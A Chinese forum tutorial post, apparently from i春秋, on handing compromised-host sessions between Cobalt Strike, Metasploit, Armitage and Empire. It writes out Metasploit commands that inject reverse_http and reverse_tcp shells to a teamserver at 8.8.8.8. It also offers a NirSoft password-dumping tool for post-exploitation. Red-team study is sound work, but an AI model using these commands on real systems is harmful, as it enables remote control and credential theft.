用户
搜索
  • TA的每日心情

    前天 07:36
  • 签到天数: 49 天

    连续签到: 1 天

    [LV.5]常住居民I

    版主

    培训/授权项目Q547006660

    Rank: 7Rank: 7Rank: 7

    44

    主题

    162

    帖子

    2874

    魔法币
    收听
    0
    粉丝
    46
    注册时间
    2017-1-18

    秦春秋文阁春秋游侠核心白帽i春秋签约作者幽默灌水王积极活跃奖白帽高手

    J0o1ey 版主 培训/授权项目Q547006660 秦 春秋文阁 春秋游侠 核心白帽 i春秋签约作者 幽默灌水王 积极活跃奖 白帽高手 楼主
    发表于 2019-7-29 20:30:29 6211458

    0x000-前文

    Cobaltstrike系列教程(一)简介与安装
    https://bbs.ichunqiu.com/thread-52937-1-1.html
    Cobaltstrike系列教程(二)Listner与Payload生成
    https://bbs.ichunqiu.com/thread-52982-1-1.html
    Cobaltstrike系列教程(三)beacon详解
    https://bbs.ichunqiu.com/thread-52994-1-1.html
    Cobaltstrike系列教程(四)菜单栏与视图
    https://bbs.ichunqiu.com/thread-52997-1-1.html
    Cobaltstrike系列教程(五)凭据导出
    https://bbs.ichunqiu.com/thread-53001-1-1.html
    Cobaltstrike系列教程(六)文件/进程管理与键盘记录
    https://bbs.ichunqiu.com/thread-53003-1-1.html
    Cobaltstrike系列教程(七)端口扫描与Net View
    https://bbs.ichunqiu.com/thread-53012-1-1.html
    Cobaltstrike系列教程(八)截图与浏览器代理
    https://bbs.ichunqiu.com/thread-53013-1-1.html
    Cobaltstrike系列教程(九)内置Socks与神器EW
    https://bbs.ichunqiu.com/thread-53014-1-1.html
    Cobaltstrike系列教程(十)安装扩展
    https://bbs.ichunqiu.com/thread-53015-1-1.html
    Cobaltstrike系列教程(十一)提权与横向移动
    https://bbs.ichunqiu.com/thread-53043-1-1.html

    0x001-Cobaltstrike与MSF会话互转

    ①Metasploit派生shell给Cobaltstrike

    首先,你需要拿到一个metepreter会话,本例中session为1
    Cobaltstrike的teamserver的ip为8.8.8.8,http监听器端口为4555

    msf exploit(handler) >  use exploit/windows/local/payload_inject
    msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
    msf exploit(payload_inject) > set DisablePayloadHandler true
    msf exploit(payload_inject) > set LHOST 8.8.8.8.
    msf exploit(payload_inject) > set LPORT 4555
    msf exploit(payload_inject) > set SESSION 1
    msf exploit(payload_inject) > exploit

    如图Cobaltstrike成功上线
    e8Qn4H.png

    ②Cobalt strike 派生 shell 给 MSF(前提有个beacon shell)

    msf > use exploit/multi/handler 
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 8.8.8.8
    lhost => 8.8.8.8
    msf exploit(handler) > set lport 5555
    lport => 5555
    msf exploit(handler) > exploit

    然后在cobaltstrike中创建一个windows/foreign/reverse_tcp Listener
    ,并根据metasploit监听配置cobaltstrike的listener
    e8QVHO.png

    选择要派生的beacon,右键-->增加会话,选择刚刚配置的foreign监听器
    e8QEDK.png

    MSF即可成功收到会话
    e8QAu6.png

    0x002-Cobaltstrike与Armitage会话互转

    ①Cobaltstrike派生shell给Armitage

    首先在armitage中配置一个handler,注意:payload要与cobaltstrike的foreign监听器的协议相同,不然收不到会话。
    e8Qlvt.png
    同样使用刚刚讲过的cobaltstrike派生会话功能,armitage即可收到shell
    e8Q3KP.png

    Armitage派生shell给cobaltstrike

    选择armitage中的会话,右键,Access-->Pss Session
    e8QeED.png
    随后配置相关信息为cobaltstrike http监听器的ip和端口
    e8QmUe.png
    Cobaltstrike即可收到会话

    0x003-Cobaltstrike与Empire会话互转

    首先如图,在empire中配置好相关的http协议监听器
    e8QKCd.png
    在cobaltstrike里面添加一个foreign监听器,协议为http
    e8QM8A.png
    随后使用cobaltstrike中讲过的“增加会话”功能,选择该http监听器,empire即可成功收到会话。

    0x004-小福利

    今天分享的是神器nirsoft半汉化版,该程序在以管理员的身份运行时,可以读取机器中各种各样的密码,无疑是后渗透的神器之一。
    回复下载

    e8QQgI.png


    游客,如果您要查看本帖隐藏内容请回复

    本帖被以下淘专辑推荐:

    有培训需求或是技术交流需求的朋友可以联系我~QQ547006660交流群820783253,团队首页www.gcowsec.ocm
    Cobaltstrike系列教程(十二)CS与MSF,Armitage,Empire会话互转
    https://bbs.ichunqiu.com/forum.p ... &fromuid=214596
    (出处: i春秋社区-分享你的技术,为安全加点温度.)
    使用道具 举报 回复
    强                 
    使用道具 举报 回复
    kkkkkkkkkkkkkkkkjjjjjjjjjjjjjjjjjjjjjjjjjjjjhhh
    使用道具 举报 回复
    发表于 2019-8-21 22:36:08
    瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅
    使用道具 举报 回复
    吱吱吱吱吱吱吱吱吱吱吱吱吱吱吱吱吱吱吱
    使用道具 举报 回复

    好久没见这么系统详细的文章了,谢谢楼主
    使用道具 举报 回复
    66666666666666666666666666666666666
    使用道具 举报 回复

    6666666666666666666666666666666666
    使用道具 举报 回复
    嘻嘻嘻谢谢分享
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    66666666666666
    使用道具 举报 回复
    发表于 2019-7-30 17:50:35
    谢谢大佬
    使用道具 举报 回复
    发表于 2019-7-30 18:17:59
    6666666666666
    使用道具 举报 回复
    发表于 2019-7-30 21:22:46
    謝謝分享
    使用道具 举报 回复
    发表于 2019-7-31 03:54:36
    来了
    使用道具 举报 回复
    很好啊吓走了
    使用道具 举报 回复
    发表于 2019-7-31 16:31:09
    6666666666666666
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    nirsoft半汉化版
    使用道具 举报 回复
    发表于 2019-8-1 00:48:50

    66666666666666
    使用道具 举报 回复
    发表于 2019-8-1 17:02:05
    看福利  收工具
    使用道具 举报 回复
    66666666666
    使用道具 举报 回复
    12345下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册